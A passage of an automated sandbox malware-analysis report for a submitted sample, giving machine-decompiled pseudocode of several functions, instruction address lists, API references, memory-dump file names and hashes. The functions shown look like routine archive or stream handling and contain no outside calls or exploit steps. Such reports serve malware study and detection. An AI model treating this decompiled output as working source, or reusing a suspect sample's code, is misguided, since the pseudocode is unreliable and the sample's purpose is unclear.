													_t177 =  *(_t298 - 0x10);
													goto L30;
												}
											}
											E00405DEF(_t298 - 0x50);
											E00403204(E00405DEF(_t298 - 0x1c),  *((intOrPtr*)(_t298 - 0x28)));
											_t163 =  *(_t298 + 0xc);
											goto L61;
										}
										L18:
										_t230 = 0x80004005;
										goto L46;
									}
									_t166 =  *(_t294 + 0x64);
									goto L20;
								}
								L14:
								_t230 = _t165;
								goto L46;
							}
							_t297 = 0x80004005;
							goto L10;
						}
						E004037D2(_t298 - 0x28, _t294 + 0x50);
						goto L12;
					} else {
						_t297 = _t156;
						L10:
						E00403204(E00405DEF(_t298 - 0x1c),  *((intOrPtr*)(_t298 - 0x28)));
						_t163 = _t297;
						goto L61;
					}
				} else {
					_t163 = 0x80004004;
					L61:
					 *[fs:0x0] =  *((intOrPtr*)(_t298 - 0xc));
					return _t163;
				}
			}

































                                                                                                                            0x00401f2b
                                                                                                                            0x00401f38
                                                                                                                            0x00401f49
                                                                                                                            0x00401f55
                                                                                                                            0x00401f5a
                                                                                                                            0x00401f5c
                                                                                                                            0x00401f61
                                                                                                                            0x00401f64
                                                                                                                            0x00401f64
                                                                                                                            0x00401f6a
                                                                                                                            0x00401f6f
                                                                                                                            0x00401f72
                                                                                                                            0x00401f76
                                                                                                                            0x00401f7a
                                                                                                                            0x00401f7d
                                                                                                                            0x00401f80
                                                                                                                            0x00401f86
                                                                                                                            0x00401f91
                                                                                                                            0x00401f94
                                                                                                                            0x00401f96
                                                                                                                            0x00401f9c
                                                                                                                            0x00401fa0
                                                                                                                            0x00401fb0
                                                                                                                            0x00401fb5
                                                                                                                            0x00401fda
                                                                                                                            0x00401fdf
                                                                                                                            0x00401fe6
                                                                                                                            0x00401fee
                                                                                                                            0x00401ff1
                                                                                                                            0x00401ff6
                                                                                                                            0x00401ff9
                                                                                                                            0x00402338
                                                                                                                            0x0040233b
                                                                                                                            0x0040233d
                                                                                                                            0x00402340
                                                                                                                            0x00402346
                                                                                                                            0x00402346
                                                                                                                            0x00000000
                                                                                                                            0x00402346
                                                                                                                            0x00401fff
                                                                                                                            0x00402003
                                                                                                                            0x00402007
                                                                                                                            0x0040200a
                                                                                                                            0x00402017
                                                                                                                            0x0040201b
                                                                                                                            0x0040201e
                                                                                                                            0x00402020
                                                                                                                            0x00402029
                                                                                                                            0x0040202d
                                                                                                                            0x00402034
                                                                                                                            0x00402039
                                                                                                                            0x00402045
                                                                                                                            0x00402048
                                                                                                                            0x00402048
                                                                                                                            0x0040204b
                                                                                                                            0x00402058
                                                                                                                            0x0040205b
                                                                                                                            0x0040205d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040205f
                                                                                                                            0x00402063
                                                                                                                            0x00402066
                                                                                                                            0x0040206a
                                                                                                                            0x00402071
                                                                                                                            0x00402074
                                                                                                                            0x00402077
                                                                                                                            0x00402084
                                                                                                                            0x00402088
                                                                                                                            0x0040208b
                                                                                                                            0x0040208d
                                                                                                                            0x00402090
                                                                                                                            0x004020b3
                                                                                                                            0x004020b8
                                                                                                                            0x004020ba
                                                                                                                            0x004020be
                                                                                                                            0x004020be
                                                                                                                            0x004020be
                                                                                                                            0x004020be
                                                                                                                            0x004020c5
                                                                                                                            0x004020c9
                                                                                                                            0x004020ce
                                                                                                                            0x004020db
                                                                                                                            0x004020de
                                                                                                                            0x004020e0
                                                                                                                            0x00000000
                                                                                                                            0x004020e6
                                                                                                                            0x004020e6
                                                                                                                            0x004020ea
                                                                                                                            0x004020ec
                                                                                                                            0x00402107
                                                                                                                            0x0040210a
                                                                                                                            0x0040210c
                                                                                                                            0x0040210f
                                                                                                                            0x0040210f
                                                                                                                            0x00402112
                                                                                                                            0x00402115
                                                                                                                            0x00402118
                                                                                                                            0x00402121
                                                                                                                            0x00402125
                                                                                                                            0x0040212a
                                                                                                                            0x0040212d
                                                                                                                            0x00402140
                                                                                                                            0x00402145
                                                                                                                            0x00402148
                                                                                                                            0x0040214c
                                                                                                                            0x00402151
                                                                                                                            0x00402151
                                                                                                                            0x00402156
                                                                                                                            0x00402159
                                                                                                                            0x0040215b
                                                                                                                            0x0040215e
                                                                                                                            0x00402165
                                                                                                                            0x00402166
                                                                                                                            0x00402166
                                                                                                                            0x0040215e
                                                                                                                            0x00402175
                                                                                                                            0x0040217a
                                                                                                                            0x0040217d
                                                                                                                            0x00402181
                                                                                                                            0x004021b0
                                                                                                                            0x004021b8
                                                                                                                            0x004021c6
                                                                                                                            0x004021ca
                                                                                                                            0x004021cf
                                                                                                                            0x004021d1
                                                                                                                            0x00402234
                                                                                                                            0x00402234
                                                                                                                            0x00402237
                                                                                                                            0x004022fb
                                                                                                                            0x0040231a
                                                                                                                            0x00402325
                                                                                                                            0x00402329
                                                                                                                            0x00402331
                                                                                                                            0x00000000
                                                                                                                            0x00402331
                                                                                                                            0x0040223d
                                                                                                                            0x0040223f
                                                                                                                            0x00402244
                                                                                                                            0x00402247
                                                                                                                            0x0040225a
                                                                                                                            0x0040225a
                                                                                                                            0x00402249
                                                                                                                            0x00402249
                                                                                                                            0x0040224c
                                                                                                                            0x00402250
                                                                                                                            0x00402256
                                                                                                                            0x00402256
                                                                                                                            0x0040225c
                                                                                                                            0x0040225e
                                                                                                                            0x00402261
                                                                                                                            0x00402264
                                                                                                                            0x00402269
                                                                                                                            0x00402269
                                                                                                                            0x0040226f
                                                                                                                            0x00402275
                                                                                                                            0x0040227b
                                                                                                                            0x0040227f
                                                                                                                            0x00402282
                                                                                                                            0x00402287
                                                                                                                            0x00402289
                                                                                                                            0x004022ed
                                                                                                                            0x004022f5
                                                                                                                            0x004022f9
                                                                                                                            0x00000000
                                                                                                                            0x0040228b
                                                                                                                            0x00402297
                                                                                                                            0x0040229c
                                                                                                                            0x0040229e
                                                                                                                            0x004022a2
                                                                                                                            0x004022a7
                                                                                                                            0x004022a7
                                                                                                                            0x004022bd
                                                                                                                            0x004022c8
                                                                                                                            0x004022cc
                                                                                                                            0x004022dc
                                                                                                                            0x004022e2
                                                                                                                            0x00000000
                                                                                                                            0x004022e2
                                                                                                                            0x00402289
                                                                                                                            0x004021d6
                                                                                                                            0x004021db
                                                                                                                            0x004021dd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004021f3
                                                                                                                            0x004021f9
                                                                                                                            0x00000000
                                                                                                                            0x00402183
                                                                                                                            0x00402183
                                                                                                                            0x0040218c
                                                                                                                            0x00402191
                                                                                                                            0x00402194
                                                                                                                            0x00402196
                                                                                                                            0x004021a3
                                                                                                                            0x00402198
                                                                                                                            0x00402198
                                                                                                                            0x00402198
                                                                                                                            0x004021fe
                                                                                                                            0x00402209
                                                                                                                            0x00402210
                                                                                                                            0x00402213
                                                                                                                            0x00402217
                                                                                                                            0x0040221c
                                                                                                                            0x00402227
                                                                                                                            0x0040222d
                                                                                                                            0x00000000
                                                                                                                            0x0040222d
                                                                                                                            0x00402181
                                                                                                                            0x0040212f
                                                                                                                            0x00000000
                                                                                                                            0x0040212f
                                                                                                                            0x004020ee
                                                                                                                            0x004020f1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004020fa
                                                                                                                            0x004020fd
                                                                                                                            0x004020ff
                                                                                                                            0x00000000
                                                                                                                            0x004020ff
                                                                                                                            0x004020e0
                                                                                                                            0x00402095
                                                                                                                            0x004020a5
                                                                                                                            0x004020aa
                                                                                                                            0x00000000
                                                                                                                            0x004020ad
                                                                                                                            0x0040203b
                                                                                                                            0x0040203b
                                                                                                                            0x00000000
                                                                                                                            0x0040203b
                                                                                                                            0x0040202f
                                                                                                                            0x00000000
                                                                                                                            0x0040202f
                                                                                                                            0x00402022
                                                                                                                            0x00402022
                                                                                                                            0x00000000
                                                                                                                            0x00402022
                                                                                                                            0x00401fb7
                                                                                                                            0x00000000
                                                                                                                            0x00401fb7
                                                                                                                            0x00401fa9
                                                                                                                            0x00000000
                                                                                                                            0x00401f98
                                                                                                                            0x00401f98
                                                                                                                            0x00401fbc
                                                                                                                            0x00401fc7
                                                                                                                            0x00401fcd
                                                                                                                            0x00000000
                                                                                                                            0x00401fcd
                                                                                                                            0x00401f4b
                                                                                                                            0x00401f4b
                                                                                                                            0x00402348
                                                                                                                            0x0040234e
                                                                                                                            0x00402356
                                                                                                                            0x00402356

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 00401F2B
                                                                                                                              • Part of subcall function 004023F0: EnterCriticalSection.KERNEL32(?,?,?,0040B84D), ref: 004023F5
                                                                                                                              • Part of subcall function 004023F0: LeaveCriticalSection.KERNEL32(?,?,?,?,0040B84D), ref: 004023FF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterH_prologLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 367238759-0
                                                                                                                            • Opcode ID: 220cea634fa4220f2899e35a25b328741d65bd45df79bc03c8ba1a60db2c5a6d
                                                                                                                            • Instruction ID: 9aea0566c9c0e61cfee338e95f65c5ac720cc4bbfeed0489b5d27597e260e310
                                                                                                                            • Opcode Fuzzy Hash: 220cea634fa4220f2899e35a25b328741d65bd45df79bc03c8ba1a60db2c5a6d
                                                                                                                            • Instruction Fuzzy Hash: 62D19E7090020ADFCF10EFA5C9849EEBBB5AF54308F14846FE506B72D1DB786A46CB19
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00410864 Relevance: 1.7, APIs: 1, Instructions: 216COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 86%
                                                                                                                            			E00410864(intOrPtr* __ecx) {
				void* __ebx;
				char* _t105;
				signed char _t106;
				signed int _t107;
				intOrPtr* _t111;
				signed char _t113;
				void* _t114;
				void* _t117;
				signed char _t121;
				void* _t127;
				void* _t139;
				signed char _t140;
				intOrPtr _t151;
				void* _t154;
				signed int _t176;
				signed char _t178;
				intOrPtr _t180;
				intOrPtr* _t183;
				signed char _t185;
				void* _t186;
				signed int _t192;
				void* _t194;

				E00418D80(E0041A5EC, _t186);
				_t180 =  *((intOrPtr*)(_t186 + 8));
				_t183 = __ecx;
				E0040E6A5(_t180);
				 *((intOrPtr*)(_t180 + 0x100)) =  *((intOrPtr*)(__ecx + 0x40));
				 *((intOrPtr*)(_t180 + 0x104)) =  *((intOrPtr*)(__ecx + 0x44));
				_t105 = _t180 + 0xf8;
				 *_t105 =  *((intOrPtr*)(__ecx + 0x56));
				 *((char*)(_t180 + 0xf9)) =  *((intOrPtr*)(__ecx + 0x57));
				if( *_t105 != 0) {
					L16:
					_t106 = 1;
					L17:
					 *[fs:0x0] =  *((intOrPtr*)(_t186 - 0xc));
					return _t106;
				}
				 *(_t186 - 0x18) =  *(__ecx + 0x60);
				 *(_t186 - 0x14) =  *(__ecx + 0x64);
				_t107 =  *(__ecx + 0x5c);
				 *(_t186 - 0x10) =  *(__ecx + 0x68);
				 *((intOrPtr*)(_t186 + 8)) =  *((intOrPtr*)(__ecx + 0x6c));
				_t151 = 0x20;
				 *(_t186 - 0x1c) = _t107;
				 *((intOrPtr*)(_t180 + 0x140)) = _t151;
				asm("adc ebx, 0x0");
				 *((intOrPtr*)(_t180 + 0x108)) =  *((intOrPtr*)(__ecx + 0x40)) + _t151;
				 *((intOrPtr*)(_t180 + 0x10c)) =  *((intOrPtr*)(__ecx + 0x44));
				 *(_t180 + 0x148) =  *(_t180 + 0x148) & 0;
				_t192 =  *(_t186 - 0x18);
				 *(_t180 + 0x144) = 0;
				if(_t192 < 0 || _t192 <= 0 && _t107 < 0) {
					goto L16;
				} else {
					_t194 =  *(_t186 - 0x10) - 0x40000000;
					if(_t194 > 0 || _t194 >= 0 &&  *(_t186 - 0x14) > 0) {
						goto L16;
					} else {
						if(( *(_t186 - 0x14) |  *(_t186 - 0x10)) != 0) {
							__eflags =  *((char*)(_t180 + 0x14c));
							if( *((char*)(_t180 + 0x14c)) == 0) {
								 *(_t180 + 0x148) = 1;
							}
							asm("adc ebx, 0x0");
							 *((intOrPtr*)(_t183 + 0x70)) =  *((intOrPtr*)(_t183 + 0x70)) +  *(_t186 - 0x14) + _t151;
							_t176 =  *(_t186 - 0x10);
							asm("adc [esi+0x74], ebx");
							_t139 =  *(_t186 - 0x14) + _t107;
							asm("adc edx, [ebp-0x18]");
							 *((intOrPtr*)(_t180 + 0x140)) = _t139 + _t151;
							asm("adc ecx, 0x0");
							 *(_t180 + 0x144) = _t176;
							_t154 =  *((intOrPtr*)(_t183 + 0x48)) -  *((intOrPtr*)(_t180 + 0x108));
							asm("sbb eax, [edi+0x10c]");
							__eflags =  *((intOrPtr*)(_t183 + 0x4c)) - _t176;
							if(__eflags > 0) {
								L18:
								_t111 =  *_t183;
								_t106 =  *((intOrPtr*)( *_t111 + 0x10))(_t111,  *(_t186 - 0x1c),  *(_t186 - 0x18), 1, 0);
								__eflags = _t106;
								if(_t106 != 0) {
									goto L17;
								}
								_t140 =  *(_t186 - 0x14);
								__eflags = _t140 - _t140;
								if(_t140 != _t140) {
									L21:
									_t106 = 0x8007000e;
									goto L17;
								}
								__eflags = _t106 -  *(_t186 - 0x10);
								if(_t106 ==  *(_t186 - 0x10)) {
									 *(_t186 - 0x24) =  *(_t186 - 0x24) & 0x00000000;
									 *(_t186 - 0x20) =  *(_t186 - 0x20) & 0x00000000;
									_push(_t140);
									 *(_t186 - 0x24) = E004031DD();
									 *(_t186 - 0x20) = _t140;
									 *(_t186 - 4) =  *(_t186 - 4) & 0x00000000;
									_t113 = E00407B3A(__eflags, _t140);
									__eflags = _t113;
									if(_t113 == 0) {
										_t158 =  *(_t186 - 0x24);
										_t178 = _t140;
										_t114 = E00418C10( *(_t186 - 0x24), _t178);
										__eflags = _t114 -  *((intOrPtr*)(_t186 + 8));
										if(_t114 !=  *((intOrPtr*)(_t186 + 8))) {
											E0040E966(_t158);
										}
										__eflags =  *((char*)(_t180 + 0x14c));
										if( *((char*)(_t180 + 0x14c)) == 0) {
											 *((char*)(_t180 + 0x149)) = 1;
										}
										 *(_t186 - 0x28) =  *(_t186 - 0x28) & 0x00000000;
										 *(_t186 - 0x27) =  *(_t186 - 0x27) & 0x00000000;
										 *(_t186 - 4) = 1;
										E0040E8FC(_t183, _t186 - 0x24);
										 *((intOrPtr*)(_t186 - 0x38)) = 0;
										 *(_t186 - 0x34) = 0;
										 *((intOrPtr*)(_t186 - 0x30)) = 0;
										_t160 =  *((intOrPtr*)(_t183 + 0x38));
										 *(_t186 - 4) = 2;
										_t117 = E0040EA46( *((intOrPtr*)(_t183 + 0x38)));
										__eflags = _t117 - 1;
										if(_t117 != 1) {
											L30:
											__eflags = _t117 - 0x17;
											if(_t117 != 0x17) {
												L32:
												E0040E966(_t160);
												L33:
												_t161 = _t183;
												_t121 = E0040FE8A(_t183, _t178, __eflags,  *((intOrPtr*)(_t180 + 0x108)),  *((intOrPtr*)(_t180 + 0x10c)), _t180 + 0x118, _t186 - 0x38); // executed
												__eflags = _t121;
												if(_t121 != 0) {
													goto L42;
												}
												__eflags =  *(_t186 - 0x34);
												if( *(_t186 - 0x34) != 0) {
													__eflags =  *(_t186 - 0x34) - 1;
													if( *(_t186 - 0x34) > 1) {
														E0040E966(_t161);
													}
													E0040E883(_t186 - 0x2c);
													E0040E8FC(_t183,  *((intOrPtr*)( *((intOrPtr*)(_t186 - 0x38)))));
													_t167 =  *((intOrPtr*)(_t183 + 0x38));
													_t127 = E0040EA46( *((intOrPtr*)(_t183 + 0x38)));
													__eflags = _t127 - 1;
													if(_t127 != 1) {
														L40:
														E0040E966(_t167);
														goto L41;
													}
													__eflags = _t178;
													if(__eflags == 0) {
														goto L41;
													}
													goto L40;
												}
												_t185 = 0;
												goto L43;
											}
											__eflags = _t178;
											if(__eflags == 0) {
												goto L33;
											}
											goto L32;
										} else {
											__eflags = _t178;
											if(__eflags == 0) {
												L41:
												 *(_t180 + 0x148) = 1;
												 *((intOrPtr*)(_t180 + 0x138)) =  *((intOrPtr*)(_t183 + 0x70));
												 *((intOrPtr*)(_t180 + 0x13c)) =  *((intOrPtr*)(_t183 + 0x74));
												_t121 = E00410138(_t183, _t178, __eflags, _t180);
												L42:
												_t185 = _t121;
												L43:
												 *(_t186 - 4) = 1;
												E00410DA8(0, _t186 - 0x38);
												_t96 = _t186 - 4;
												 *_t96 =  *(_t186 - 4) & 0x00000000;
												__eflags =  *_t96;
												_t113 = E0040E883(_t186 - 0x2c);
												L44:
												E00403204(_t113,  *(_t186 - 0x24));
												_t106 = _t185;
												goto L17;
											}
											goto L30;
										}
									}
									_t185 = _t113;
									goto L44;
								}
								goto L21;
							} else {
								if(__eflags < 0) {
									L15:
									 *((char*)(_t180 + 0x14b)) = 1;
									goto L16;
								}
								__eflags = _t154 - _t139;
								if(_t154 >= _t139) {
									goto L18;
								}
								goto L15;
							}
						}
						if((_t107 |  *(_t186 - 0x18)) != 0) {
							goto L16;
						}
						 *(_t180 + 0x148) = 1;
						_t106 = 0;
						goto L17;
					}
				}
			}

























                                                                                                                            0x00410869
                                                                                                                            0x00410874
                                                                                                                            0x00410877
                                                                                                                            0x0041087b
                                                                                                                            0x00410883
                                                                                                                            0x0041088c
                                                                                                                            0x00410895
                                                                                                                            0x0041089b
                                                                                                                            0x004108a3
                                                                                                                            0x004108a9
                                                                                                                            0x0041099e
                                                                                                                            0x004109a0
                                                                                                                            0x004109a1
                                                                                                                            0x004109a7
                                                                                                                            0x004109af
                                                                                                                            0x004109af
                                                                                                                            0x004108b5
                                                                                                                            0x004108bb
                                                                                                                            0x004108c4
                                                                                                                            0x004108c7
                                                                                                                            0x004108cf
                                                                                                                            0x004108d2
                                                                                                                            0x004108d3
                                                                                                                            0x004108d8
                                                                                                                            0x004108de
                                                                                                                            0x004108e1
                                                                                                                            0x004108e9
                                                                                                                            0x004108ef
                                                                                                                            0x004108f5
                                                                                                                            0x004108f8
                                                                                                                            0x004108fe
                                                                                                                            0x00000000
                                                                                                                            0x0041090e
                                                                                                                            0x0041090e
                                                                                                                            0x00410915
                                                                                                                            0x00000000
                                                                                                                            0x00410922
                                                                                                                            0x00410928
                                                                                                                            0x0041093a
                                                                                                                            0x00410941
                                                                                                                            0x00410943
                                                                                                                            0x00410943
                                                                                                                            0x00410952
                                                                                                                            0x00410955
                                                                                                                            0x00410958
                                                                                                                            0x0041095b
                                                                                                                            0x00410961
                                                                                                                            0x00410963
                                                                                                                            0x0041096c
                                                                                                                            0x00410972
                                                                                                                            0x00410975
                                                                                                                            0x0041097e
                                                                                                                            0x00410987
                                                                                                                            0x0041098d
                                                                                                                            0x0041098f
                                                                                                                            0x004109b2
                                                                                                                            0x004109b2
                                                                                                                            0x004109c1
                                                                                                                            0x004109c4
                                                                                                                            0x004109c6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004109c8
                                                                                                                            0x004109cb
                                                                                                                            0x004109cd
                                                                                                                            0x004109d4
                                                                                                                            0x004109d4
                                                                                                                            0x00000000
                                                                                                                            0x004109d4
                                                                                                                            0x004109cf
                                                                                                                            0x004109d2
                                                                                                                            0x004109db
                                                                                                                            0x004109df
                                                                                                                            0x004109e3
                                                                                                                            0x004109ea
                                                                                                                            0x004109ed
                                                                                                                            0x004109f2
                                                                                                                            0x004109f9
                                                                                                                            0x004109fe
                                                                                                                            0x00410a00
                                                                                                                            0x00410a09
                                                                                                                            0x00410a0c
                                                                                                                            0x00410a0e
                                                                                                                            0x00410a13
                                                                                                                            0x00410a16
                                                                                                                            0x00410a18
                                                                                                                            0x00410a18
                                                                                                                            0x00410a1d
                                                                                                                            0x00410a24
                                                                                                                            0x00410a26
                                                                                                                            0x00410a26
                                                                                                                            0x00410a2d
                                                                                                                            0x00410a31
                                                                                                                            0x00410a3d
                                                                                                                            0x00410a41
                                                                                                                            0x00410a48
                                                                                                                            0x00410a4b
                                                                                                                            0x00410a4e
                                                                                                                            0x00410a51
                                                                                                                            0x00410a54
                                                                                                                            0x00410a58
                                                                                                                            0x00410a5d
                                                                                                                            0x00410a60
                                                                                                                            0x00410a66
                                                                                                                            0x00410a66
                                                                                                                            0x00410a69
                                                                                                                            0x00410a6f
                                                                                                                            0x00410a6f
                                                                                                                            0x00410a74
                                                                                                                            0x00410a77
                                                                                                                            0x00410a8d
                                                                                                                            0x00410a92
                                                                                                                            0x00410a94
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00410a96
                                                                                                                            0x00410a99
                                                                                                                            0x00410a9f
                                                                                                                            0x00410aa3
                                                                                                                            0x00410aa5
                                                                                                                            0x00410aa5
                                                                                                                            0x00410aad
                                                                                                                            0x00410abb
                                                                                                                            0x00410ac0
                                                                                                                            0x00410ac3
                                                                                                                            0x00410ac8
                                                                                                                            0x00410acb
                                                                                                                            0x00410ad1
                                                                                                                            0x00410ad1
                                                                                                                            0x00000000
                                                                                                                            0x00410ad1
                                                                                                                            0x00410acd
                                                                                                                            0x00410acf
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00410acf
                                                                                                                            0x00410a9b
                                                                                                                            0x00000000
                                                                                                                            0x00410a9b
                                                                                                                            0x00410a6b
                                                                                                                            0x00410a6d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00410a62
                                                                                                                            0x00410a62
                                                                                                                            0x00410a64
                                                                                                                            0x00410ad6
                                                                                                                            0x00410ad6
                                                                                                                            0x00410ae0
                                                                                                                            0x00410aec
                                                                                                                            0x00410af2
                                                                                                                            0x00410af7
                                                                                                                            0x00410af7
                                                                                                                            0x00410af9
                                                                                                                            0x00410afc
                                                                                                                            0x00410b00
                                                                                                                            0x00410b05
                                                                                                                            0x00410b05
                                                                                                                            0x00410b05
                                                                                                                            0x00410b0c
                                                                                                                            0x00410b11
                                                                                                                            0x00410b14
                                                                                                                            0x00410b1a
                                                                                                                            0x00000000
                                                                                                                            0x00410b1a
                                                                                                                            0x00000000
                                                                                                                            0x00410a64
                                                                                                                            0x00410a60
                                                                                                                            0x00410a02
                                                                                                                            0x00000000
                                                                                                                            0x00410a02
                                                                                                                            0x00000000
                                                                                                                            0x00410991
                                                                                                                            0x00410991
                                                                                                                            0x00410997
                                                                                                                            0x00410997
                                                                                                                            0x00000000
                                                                                                                            0x00410997
                                                                                                                            0x00410993
                                                                                                                            0x00410995
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00410995
                                                                                                                            0x0041098f
                                                                                                                            0x0041092d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041092f
                                                                                                                            0x00410936
                                                                                                                            0x00000000
                                                                                                                            0x00410936
                                                                                                                            0x00410915

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3519838083-0
                                                                                                                            • Opcode ID: 629039187cee0bc8d250b5563ab5e0071ef84874249a4d4adb71f335476c5ecd
                                                                                                                            • Instruction ID: 45b12642a324e08f911b4fbefe6149a1cb9296f609db2837831a0bfb9efd5dc6
                                                                                                                            • Opcode Fuzzy Hash: 629039187cee0bc8d250b5563ab5e0071ef84874249a4d4adb71f335476c5ecd
                                                                                                                            • Instruction Fuzzy Hash: 34917DB0A007459BDB24DBA5C4907EEFBF1BF59314F14452EE489A3352C7B869C0CB99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A2C8 Relevance: 1.7, APIs: 1, Instructions: 180COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 64%
                                                                                                                            			E0040A2C8(intOrPtr* __ecx) {
				signed int _t58;
				signed int _t59;
				signed int _t60;
				intOrPtr* _t61;
				intOrPtr* _t63;
				signed int _t81;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t87;
				signed int* _t97;
				intOrPtr _t115;
				void* _t128;
				void* _t129;
				void* _t130;
				void* _t131;
				void* _t132;
				void* _t133;
				signed int* _t139;
				intOrPtr* _t142;
				signed int _t144;
				intOrPtr _t145;
				void* _t147;

				E00418D80(E00419E04, _t147);
				_t142 = __ecx;
				_t58 = E00409DAD(__ecx,  *((intOrPtr*)(_t147 + 8))); // executed
				if(_t58 != 0) {
					L22:
					 *[fs:0x0] =  *((intOrPtr*)(_t147 - 0xc));
					return _t58;
				}
				if( *__ecx == _t58) {
					L21:
					_t58 = 0;
					goto L22;
				}
				_t59 =  *(__ecx + 8);
				_t97 = __ecx + 8;
				if(_t59 != 0) {
					 *((intOrPtr*)( *_t59 + 8))(_t59);
					 *_t97 =  *_t97 & 0x00000000;
				}
				_t60 =  *(_t142 + 0xc);
				_t139 = _t142 + 0xc;
				if(_t60 != 0) {
					 *((intOrPtr*)( *_t60 + 8))(_t60);
					 *_t139 =  *_t139 & 0x00000000;
				}
				_t61 =  *_t142;
				 *((intOrPtr*)( *_t61))(_t61, 0x41b1e0, _t97);
				_t63 =  *_t142;
				 *((intOrPtr*)( *_t63))(_t63, 0x41b1d0, _t139);
				_push(_t142 + 0xd9);
				_t128 = 0x42;
				_t58 = E0040A4E3( *_t142, _t128);
				if(_t58 != 0) {
					goto L22;
				} else {
					_push(_t142 + 0xdb);
					_t129 = 0x41;
					_t58 = E0040A4E3( *_t142, _t129);
					if(_t58 != 0) {
						goto L22;
					}
					_push(_t142 + 0xdc);
					_t130 = 0x3f;
					_t58 = E0040A4E3( *_t142, _t130);
					if(_t58 != 0) {
						goto L22;
					}
					_push(_t142 + 0xdd);
					_t131 = 0x40;
					_t58 = E0040A4E3( *_t142, _t131);
					if(_t58 != 0) {
						goto L22;
					}
					_push(_t142 + 0xde);
					_t132 = 0x5b;
					_t58 = E0040A4E3( *_t142, _t132);
					if(_t58 != 0) {
						goto L22;
					}
					_push(_t142 + 0xda);
					_t133 = 0x5d;
					_t58 = E0040A4E3( *_t142, _t133);
					if(_t58 != 0) {
						goto L22;
					}
					E0040429A(_t142 + 0x70);
					 *((intOrPtr*)(_t147 - 4)) = 0;
					E0040368D(_t147 - 0x24);
					 *((char*)(_t147 - 4)) = 1;
					if(E00403A5B(_t147 - 0x18, 0x2e) >= 0) {
						E0040376E(_t147 - 0x24,  *((intOrPtr*)(_t147 - 0x18)) + 2 + _t73 * 2);
					}
					_t74 =  *((intOrPtr*)(_t142 + 0x88));
					_t140 = _t142 + 0x88;
					 *((intOrPtr*)(_t142 + 0x8c)) = 0;
					 *((short*)( *((intOrPtr*)(_t142 + 0x88)))) = 0;
					_t144 =  *(_t142 + 0x94);
					if(_t144 >= 0) {
						_t145 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t147 + 8)))) + 8)) + _t144 * 4));
						if( *((intOrPtr*)(_t145 + 0x1c)) != 0) {
							_t81 = E00409144(_t145, _t147 - 0x24);
							if(_t81 < 0) {
								_t81 = 0;
							}
							_t115 =  *((intOrPtr*)(_t145 + 0x18));
							_t49 =  *((intOrPtr*)(_t115 + _t81 * 4)) + 0xc; // 0xc
							_push( *((intOrPtr*)(_t115 + _t81 * 4)));
							_t83 = E00408FCD(_t147 - 0x48, _t147 - 0x18);
							 *((char*)(_t147 - 4)) = 5;
							_t74 = E00403204(E004037D2(_t140, _t83),  *((intOrPtr*)(_t147 - 0x48)));
						} else {
							_t85 = E0040368D(_t147 - 0x48);
							 *((char*)(_t147 - 4)) = 2;
							_t86 = E0040368D(_t147 - 0x3c);
							_push(_t85);
							_push(_t86);
							 *((char*)(_t147 - 4)) = 3;
							_t87 = E00408FCD(_t147 - 0x30, _t147 - 0x18);
							 *((char*)(_t147 - 4)) = 4;
							_t74 = E00403204(E00403204(E00403204(E004037D2(_t140, _t87),  *((intOrPtr*)(_t147 - 0x30))),  *((intOrPtr*)(_t147 - 0x3c))),  *((intOrPtr*)(_t147 - 0x48)));
						}
					}
					E00403204(E00403204(_t74,  *((intOrPtr*)(_t147 - 0x24))),  *((intOrPtr*)(_t147 - 0x18)));
					goto L21;
				}
			}


























                                                                                                                            0x0040a2cd
                                                                                                                            0x0040a2d8
                                                                                                                            0x0040a2dd
                                                                                                                            0x0040a2e4
